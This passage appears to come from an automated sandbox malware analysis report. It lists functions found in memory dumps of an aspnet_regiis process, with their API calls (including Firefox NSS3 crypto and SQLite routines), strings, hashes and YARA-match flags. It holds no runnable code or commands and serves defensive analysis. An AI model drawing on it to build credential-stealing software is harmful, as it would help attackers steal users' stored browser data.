                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
                                                                                                                                                                              • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                              • API String ID: 3905088656-1374795319
                                                                                                                                                                              • Opcode ID: 17041ab4b72eb09c6669ff6ae96c08d8e5f3b78a1c430c15e12419dd0fdebf2b
                                                                                                                                                                              • Instruction ID: 8d5d0681d23990df723bd2a2704f82934c0e43c4096fd8dd196d9a763d2eefc1
                                                                                                                                                                              • Opcode Fuzzy Hash: 17041ab4b72eb09c6669ff6ae96c08d8e5f3b78a1c430c15e12419dd0fdebf2b
                                                                                                                                                                              • Instruction Fuzzy Hash: 11F062B59001147BEE017FA0DC4AC9B3F3DDF86664F044464FD0956602EA36F914D6B3
                                                                                                                                                                              Function 6CBF0C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(6CBF2C2A), ref: 6CBF0C81
                                                                                                                                                                                • Part of subcall function 6CBDBE30: SECOID_FindOID_Util.NSS3(6CB9311B,00000000,?,6CB9311B,?), ref: 6CBDBE44
                                                                                                                                                                                • Part of subcall function 6CBC8500: SECOID_GetAlgorithmTag_Util.NSS3(6CBC95DC,00000000,00000000,00000000,?,6CBC95DC,00000000,00000000,?,6CBA7F4A,00000000,?,00000000,00000000), ref: 6CBC8517
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBF0CC4
                                                                                                                                                                                • Part of subcall function 6CBDFAB0: free.MOZGLUE(?,-00000001,?,?,6CB7F673,00000000,00000000), ref: 6CBDFAC7
                                                                                                                                                                              • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CBF0CD5
                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6CBF0D1D
                                                                                                                                                                              • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6CBF0D3B
                                                                                                                                                                              • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6CBF0D7D
                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CBF0DB5
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBF0DC1
                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CBF0DF7
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBF0E05
                                                                                                                                                                              • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CBF0E0F
                                                                                                                                                                                • Part of subcall function 6CBC95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CBA7F4A,00000000,?,00000000,00000000), ref: 6CBC95E0
                                                                                                                                                                                • Part of subcall function 6CBC95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CBA7F4A,00000000,?,00000000,00000000), ref: 6CBC95F5
                                                                                                                                                                                • Part of subcall function 6CBC95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CBC9609
                                                                                                                                                                                • Part of subcall function 6CBC95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CBC961D
                                                                                                                                                                                • Part of subcall function 6CBC95C0: PK11_GetInternalSlot.NSS3 ref: 6CBC970B
                                                                                                                                                                                • Part of subcall function 6CBC95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CBC9756
                                                                                                                                                                                • Part of subcall function 6CBC95C0: PK11_GetIVLength.NSS3(?), ref: 6CBC9767
                                                                                                                                                                                • Part of subcall function 6CBC95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CBC977E
                                                                                                                                                                                • Part of subcall function 6CBC95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CBC978E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3136566230-0
                                                                                                                                                                              • Opcode ID: 6e123a43d4d7e879d6958617ac2283b96757aeb5568bbe7f03f7c30f4968b2c7
                                                                                                                                                                              • Instruction ID: b0d57fb7d48a55a279fa696d0155a2c501e315861bc79087ffa67b35820af6ee
                                                                                                                                                                              • Opcode Fuzzy Hash: 6e123a43d4d7e879d6958617ac2283b96757aeb5568bbe7f03f7c30f4968b2c7
                                                                                                                                                                              • Instruction Fuzzy Hash: 6C41C2B5900296ABEB009F64EC41BAF7674EF04348F144028ED2567751EB35FA59CBF2
                                                                                                                                                                              Function 6CB22E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB22F3D
                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6CB22FB9
                                                                                                                                                                              • memcpy.VCRUNTIME140(?,00000000,?), ref: 6CB23005
                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6CB230EE
                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB23131
                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB23178
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: memcpy$memsetsqlite3_log
                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                              • API String ID: 984749767-598938438
                                                                                                                                                                              • Opcode ID: ccd6e81f45b3aa4b121a6a4d7c7d7c34df67b75696a3164d39c984321ac7fb94
                                                                                                                                                                              • Instruction ID: 8903aaaa360dcd980747687d67f498a3cb9bacccdeec1e1b2e37048c0123247e
                                                                                                                                                                              • Opcode Fuzzy Hash: ccd6e81f45b3aa4b121a6a4d7c7d7c34df67b75696a3164d39c984321ac7fb94
                                                                                                                                                                              • Instruction Fuzzy Hash: 19B18B70E052599BCB18CF99C884ABEB7B5FF48304F144029E849A7B41D7789981CBA5
                                                                                                                                                                              Function 02A1B991 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 175fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFileInformationByHandle.KERNEL32(?,?,00000000,?,09ED2488), ref: 02A1B9C5
                                                                                                                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 02A1BA3E
                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 02A1BA5A
                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 02A1BA6E
                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 02A1BA77
                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 02A1BA87
                                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 02A1BAA5
                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 02A1BAB5
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$PointerRead$HandleInformationSize
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2979504256-3916222277
                                                                                                                                                                              • Opcode ID: fe79a75f004b2799ece13b58ed7497d8fedcd80a79ad9a8a2574ee25aedfcad2
                                                                                                                                                                              • Instruction ID: 62ee407391bc40c91e7cb9701a6a1a4a21e1887bde09b5d407c4f830af835ae2
                                                                                                                                                                              • Opcode Fuzzy Hash: fe79a75f004b2799ece13b58ed7497d8fedcd80a79ad9a8a2574ee25aedfcad2
                                                                                                                                                                              • Instruction Fuzzy Hash: 1F51E6B1D0021CAFDB28DFD9DCC5AADBBB9EB44318F10482AE515E72A0DB749945CF60
                                                                                                                                                                              Function 6CBA4CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • TlsGetValue.KERNEL32(?,00000000,00000000,?,6CBAAB7F,?,00000000,?), ref: 6CBA4CB4
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C,?,6CBAAB7F,?,00000000,?), ref: 6CBA4CC8
                                                                                                                                                                              • TlsGetValue.KERNEL32(?,6CBAAB7F,?,00000000,?), ref: 6CBA4CE0
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,6CBAAB7F,?,00000000,?), ref: 6CBA4CF4
                                                                                                                                                                              • PL_HashTableLookup.NSS3(?,?,?,6CBAAB7F,?,00000000,?), ref: 6CBA4D03
                                                                                                                                                                              • PR_Unlock.NSS3(?,00000000,?), ref: 6CBA4D10
                                                                                                                                                                                • Part of subcall function 6CC2DD70: TlsGetValue.KERNEL32 ref: 6CC2DD8C
                                                                                                                                                                                • Part of subcall function 6CC2DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC2DDB4
                                                                                                                                                                              • PR_Now.NSS3(?,00000000,?), ref: 6CBA4D26
                                                                                                                                                                                • Part of subcall function 6CC49DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CC90A27), ref: 6CC49DC6
                                                                                                                                                                                • Part of subcall function 6CC49DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CC90A27), ref: 6CC49DD1
                                                                                                                                                                                • Part of subcall function 6CC49DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC49DED
                                                                                                                                                                              • PR_Unlock.NSS3(?,?,00000000,?), ref: 6CBA4D98
                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6CBA4DDA
                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6CBA4E02
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4032354334-0
                                                                                                                                                                              • Opcode ID: 50a77b3653b3f688669174f77a01a5bed1164ae89a03eeb154c7a7bcf792cf50
                                                                                                                                                                              • Instruction ID: 51047c1ad23e405ffeac727885e5a20046f1c4ecb08c8d0ab5802a9185f01b30
                                                                                                                                                                              • Opcode Fuzzy Hash: 50a77b3653b3f688669174f77a01a5bed1164ae89a03eeb154c7a7bcf792cf50
                                                                                                                                                                              • Instruction Fuzzy Hash: 1341A3B5D04651AFEB009F68EC40A5A77B8EF06219F145170EC5887B12FF31ED29CBA2
                                                                                                                                                                              Function 6CB82E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CB82CDA,?,00000000), ref: 6CB82E1E
                                                                                                                                                                                • Part of subcall function 6CBDFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CB89003,?), ref: 6CBDFD91
                                                                                                                                                                                • Part of subcall function 6CBDFD80: PORT_Alloc_Util.NSS3(A4686CBE,?), ref: 6CBDFDA2
                                                                                                                                                                                • Part of subcall function 6CBDFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686CBE,?,?), ref: 6CBDFDC4
                                                                                                                                                                              • SECITEM_DupItem_Util.NSS3(?), ref: 6CB82E33
                                                                                                                                                                                • Part of subcall function 6CBDFD80: free.MOZGLUE(00000000,?,?), ref: 6CBDFDD1
                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB82E4E
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CB82E5E
                                                                                                                                                                              • PL_HashTableLookup.NSS3(?), ref: 6CB82E71
                                                                                                                                                                              • PL_HashTableRemove.NSS3(?), ref: 6CB82E84
                                                                                                                                                                              • PL_HashTableAdd.NSS3(?,00000000), ref: 6CB82E96
                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CB82EA9
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB82EB6
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB82EC5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3332421221-0
                                                                                                                                                                              • Opcode ID: 9cef41021601aebf62fe336d508ac8ab4f46b9165f5cc8de15ba4da213e5e896
                                                                                                                                                                              • Instruction ID: 6b87d9c5e2f737aff1351f82fdb79ba916f18c451c3620eae2692f93893ed62e
                                                                                                                                                                              • Opcode Fuzzy Hash: 9cef41021601aebf62fe336d508ac8ab4f46b9165f5cc8de15ba4da213e5e896
                                                                                                                                                                              • Instruction Fuzzy Hash: B8210772A00141ABEF205B28EC0AA9A3B78DB5635EF090030ED1882751FB32D559C7B2
                                                                                                                                                                              Function 6CB0CEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CB0B999), ref: 6CB0CFF3
                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CB0B999), ref: 6CB0D02B
                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6CB0B999), ref: 6CB0D041
                                                                                                                                                                              • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6CB0B999), ref: 6CC5972B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: sqlite3_log$_byteswap_ushort
                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                              • API String ID: 491875419-598938438
                                                                                                                                                                              • Opcode ID: 46f6569611440bd7c115368c07a86676ff3bc3695894b4def172c0801208b3c1
                                                                                                                                                                              • Instruction ID: 03b41ffd4d6b781b2f8657d068c9f368434ffbf4269cd710251dde9055b2dbb3
                                                                                                                                                                              • Opcode Fuzzy Hash: 46f6569611440bd7c115368c07a86676ff3bc3695894b4def172c0801208b3c1
                                                                                                                                                                              • Instruction Fuzzy Hash: 43615871A002508FD710CF69C840BA6BBF5EF55358F6845AEE4489FB82E376D847C7A2
                                                                                                                                                                              Function 02A0DB7F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109stringmemoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrlen.KERNEL32(?,76DD5460,?,00000000), ref: 02A0DBBB
                                                                                                                                                                              • strchr.MSVCRT ref: 02A0DBCD
                                                                                                                                                                              • strchr.MSVCRT ref: 02A0DBF2
                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02A0DCF7), ref: 02A0DC14
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A0DC21
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A0DC28
                                                                                                                                                                              • strcpy_s.MSVCRT ref: 02A0DC6F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heaplstrlenstrchr$AllocateProcessstrcpy_s
                                                                                                                                                                              • String ID: 0123456789ABCDEF
                                                                                                                                                                              • API String ID: 1327626442-2554083253
                                                                                                                                                                              • Opcode ID: e0f1092ac3d1425f904253463e261686b4e83651ee2d29e2dbb67806787a0205
                                                                                                                                                                              • Instruction ID: 9ceb185f1b46ba0fd6d95e39591809f3dcd9f6d7f2cddaa636cb8b8b27d8e9ee
                                                                                                                                                                              • Opcode Fuzzy Hash: e0f1092ac3d1425f904253463e261686b4e83651ee2d29e2dbb67806787a0205
                                                                                                                                                                              • Instruction Fuzzy Hash: 19313972D006199FDB00DFE8DD84AAEBBB9EF09355F100569E901FB280DB75A905CB90
                                                                                                                                                                              Function 02A1F944 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • UnDecorator::getArgumentList.LIBCMT ref: 02A1F969
                                                                                                                                                                                • Part of subcall function 02A1F504: Replicator::operator[].LIBCMT ref: 02A1F587
                                                                                                                                                                                • Part of subcall function 02A1F504: DName::operator+=.LIBCMT ref: 02A1F58F
                                                                                                                                                                              • DName::operator+.LIBCMT ref: 02A1F9C2
                                                                                                                                                                              • DName::DName.LIBCMT ref: 02A1FA1A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                                                                                                              • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                              • API String ID: 834187326-2211150622
